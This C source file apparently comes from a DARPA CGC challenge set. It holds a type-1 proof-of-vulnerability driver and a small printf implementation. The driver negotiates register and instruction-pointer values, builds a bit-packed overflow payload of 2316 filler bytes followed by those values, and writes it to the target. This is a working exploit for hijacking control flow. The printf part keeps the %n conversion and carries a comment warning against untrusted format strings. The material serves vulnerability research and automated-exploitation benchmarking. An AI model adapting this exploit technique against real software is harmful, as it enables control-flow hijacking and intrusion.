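/*
 * CGC proof-of-vulnerability driver (type-1 PoV). After negotiating the
 * register / instruction-pointer values with the framework it writes to
 * STDOUT: a mode line, a 95-byte printable key table, a decimal length line,
 * a raw 4-byte element count, and finally the bit-packed payload.
 *
 * Every helper used here (negotiate_type1, append_var, bit_new, bit_write,
 * _print_signed, transmit_all, bio_t, STDOUT) is declared outside this
 * listing, so their contracts are assumed from the call sites, not verified.
 *
 * Returns 0 once the payload has been written, 1 if a negotiated value or
 * the bit writer could not be obtained.
 */
int main(void)
{
    enum {
        FILL_COUNT = 2316, /* filler elements ahead of the register/IP bytes */
        REG_BYTES = 4,     /* bytes of TYPE1_REG copied into the payload */
        IP_BYTES = 4       /* bytes of TYPE1_IP copied into the payload */
    };
    int i, buf_len = 0;
    char buf[32], *pbuf;
    unsigned char exploit[4096];
    unsigned char *eip = NULL, *reg = NULL;
    unsigned int eip_len = 0, reg_len = 0, exp_len = 0;
    /* Printable ASCII 0x20..0x7e, exactly 95 bytes (the length passed below). */
    char *key = " !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~";

    negotiate_type1(0xfefefefe, 0xfefefefe, 5);

    transmit_all(STDOUT, "2\n", 2);
    transmit_all(STDOUT, key, 95);

    /* Negotiated values. The second call previously read the mis-encoded
     * "®_len" instead of "&reg_len" and did not compile. append_var is
     * assumed to return at least REG_BYTES / IP_BYTES bytes — TODO confirm
     * against its definition; only reg[0..3] and eip[0..3] are read. */
    eip = append_var("TYPE1_IP", eip, &eip_len);
    reg = append_var("TYPE1_REG", reg, &reg_len);
    if (eip == NULL || reg == NULL) {
        return 1;
    }

    memset(exploit, 0, sizeof(exploit));
    bio_t *bio = bit_new(exploit);
    if (bio == NULL) {
        return 1;
    }

    /* Each payload element is a 0 marker bit followed by 8 data bits
     * (bit_write is presumably (writer, value, bit count) — confirm). With
     * FILL_COUNT + 8 elements that is 2324 * 9 bits, i.e. 2615 bytes, which
     * fits the 4096-byte buffer. The filler length is target-specific and
     * cannot be checked from this listing. */
    for (i = 0; i < FILL_COUNT; ++i) {
        bit_write(bio, '\x00', 1);
        bit_write(bio, '\x41', 8);
    }
    for (i = 0; i < REG_BYTES; ++i) {
        bit_write(bio, '\x00', 1);
        bit_write(bio, reg[i], 8);
    }
    for (i = 0; i < IP_BYTES; ++i) {
        bit_write(bio, '\x00', 1);
        bit_write(bio, eip[i], 8);
    }
    /* Bytes occupied: whole bytes plus one more if a partial byte is pending. */
    exp_len = bio->didx + !!(bio->bidx > 0);

    /* Length line: payload size plus the 4-byte element count that follows. */
    pbuf = _print_signed(buf + 32, &buf_len, exp_len + 4);
    transmit_all(STDOUT, pbuf, buf_len);
    transmit_all(STDOUT, "\n", 1);

    /* Element count as a raw int in host byte order (presumably little-endian
     * i386 on the CGC platform — confirm if the reader is ported). */
    buf_len = FILL_COUNT + REG_BYTES + IP_BYTES;
    transmit_all(STDOUT, (char *)&buf_len, 4);
    transmit_all(STDOUT, exploit, exp_len);
    return 0;
}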
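/*
 * Minimal printf core: formats @fmt with the arguments in @ap and hands the
 * output to @consumer(arg, buf, len) in pieces. Supported: %%, %d %i, %u %o
 * %x %X, %s, %n, the '0' flag, a decimal field width, and the h / H / l
 * length modifiers (h -> short, H -> char, l -> no-op; a 32-bit ABI where
 * long == int is assumed — TODO confirm for this target). The '-', '+' and
 * ' ' flags are accepted but ignored (no left-justify or sign support); an
 * unknown conversion character is emitted as literal text.
 *
 * Returns the number of bytes handed to the consumer, or -1 if the consumer
 * reported an error. A short write by the consumer stops formatting and
 * returns the partial count.
 *
 * Fixes relative to the previous version: the length modifier is reset per
 * conversion (it used to leak from e.g. "%hd" into every later "%d"); the
 * width is parsed as unsigned digits only (strtoul turned "%-5d" into a
 * field width of about 4 G and an equally long padding loop); the short-write
 * comparison no longer mixes int and size_t; and "%s" with a NULL argument
 * prints "(null)" instead of calling cgc_strlen(NULL).
 *
 * %n writes the running byte count through a caller-supplied pointer. It is
 * kept for compatibility, but it means format strings reaching this
 * function must never come from untrusted input.
 */
static int _printf(consumer_t consumer, void *arg, const char *fmt, va_list ap)
{
    char tmpbuf[32]; /* must be at least 32 bytes for _print_base */
    const char *fmtstr = NULL; /* start of the pending literal run, if any */
    int n, total = 0;

#define FLAG_ZERO_PADDING 0x01

/* Hand (b, c) to the consumer; abort on error, stop early on a short write. */
#define CONSUME(b, c) \
    do { \
        size_t tmp = (size_t)(c); \
        if (tmp == 0) break; \
        total += (n = consumer(arg, (b), tmp)); \
        if (n < 0) goto error; \
        if ((size_t)n < tmp) goto done; \
    } while (0)

/* Emit the literal text accumulated since the last conversion. */
#define FLUSH() \
    do { \
        if (fmtstr) { \
            CONSUME(fmtstr, fmt - fmtstr); \
            fmtstr = NULL; \
        } \
    } while (0)

    while (*fmt) {
        int flags = 0;
        unsigned int field_width = 0;
        char modifier = 0; /* per conversion; must not carry over */
        char *tmpstr;
        int base, outlen, sv;
        unsigned int uv;
        void *pv;

        /* Literal text is batched and flushed before the next conversion. */
        if (*fmt != '%') {
            if (fmtstr == NULL) {
                fmtstr = fmt;
            }
            fmt++;
            continue;
        }
        FLUSH();
        fmt++;

        if (*fmt == '%') {
            CONSUME(fmt, 1);
            fmt++;
            continue;
        }

        /* Flags: only '0' has an effect; '-', '+', ' ' are skipped so they
         * cannot be mistaken for part of the width. */
        for (;;) {
            if (*fmt == '0') {
                flags |= FLAG_ZERO_PADDING;
                fmt++;
            } else if (*fmt == '-' || *fmt == '+' || *fmt == ' ') {
                fmt++;
            } else {
                break;
            }
        }

        /* Field width: decimal digits only (no '*', no sign). */
        while (*fmt >= '0' && *fmt <= '9') {
            field_width = field_width * 10 + (unsigned int)(*fmt - '0');
            fmt++;
        }

        /* Length modifier. */
        if (*fmt == 'H' || *fmt == 'h' || *fmt == 'l') {
            modifier = *fmt;
            fmt++;
        }

        /* Conversion. */
        switch (*fmt) {
        case 'd':
        case 'i':
            sv = va_arg(ap, int);
            if (modifier == 'h') {
                sv = (short)(sv & 0xffff);
            } else if (modifier == 'H') {
                sv = (signed char)(sv & 0xff);
            }
            /* _print_signed fills tmpbuf backwards from its end. */
            tmpstr = _print_signed(tmpbuf + 32, &outlen, sv);
            while (field_width > (unsigned int)outlen) {
                CONSUME((flags & FLAG_ZERO_PADDING) ? "0" : " ", 1);
                field_width--;
            }
            CONSUME(tmpstr, outlen);
            fmt++;
            break;

        case 'u':
        case 'o':
        case 'x':
        case 'X':
            if (*fmt == 'u') {
                base = 10;
            } else if (*fmt == 'o') {
                base = 8;
            } else {
                base = 16;
            }
            uv = va_arg(ap, unsigned int);
            if (modifier == 'h') {
                uv &= 0xffff;
            } else if (modifier == 'H') {
                uv &= 0xff;
            }
            /* Last argument selects upper-case hex digits for 'X'. */
            tmpstr = _print_base(tmpbuf + 32, &outlen, uv, base, *fmt == 'X');
            while (field_width > (unsigned int)outlen) {
                CONSUME((flags & FLAG_ZERO_PADDING) ? "0" : " ", 1);
                field_width--;
            }
            CONSUME(tmpstr, outlen);
            fmt++;
            break;

        case 'n':
            /* Stores the byte count produced so far; the pointee width
             * follows the modifier. Dangerous with untrusted formats. */
            pv = va_arg(ap, void *);
            if (modifier == 'h') {
                *(short int *)pv = total;
            } else if (modifier == 'H') {
                *(signed char *)pv = total;
            } else {
                *(int *)pv = total;
            }
            fmt++;
            break;

        case 's':
            pv = va_arg(ap, void *);
            if (pv == NULL) {
                pv = "(null)"; /* avoid cgc_strlen(NULL) */
            }
            CONSUME((char *)pv, cgc_strlen((char *)pv));
            fmt++;
            break;

        default:
            /* Unknown conversion: leave fmt here so the character is
             * picked up as literal text on the next iteration. */
            break;
        }
    }
    FLUSH();
done:
    return total;
error:
    return -1;
}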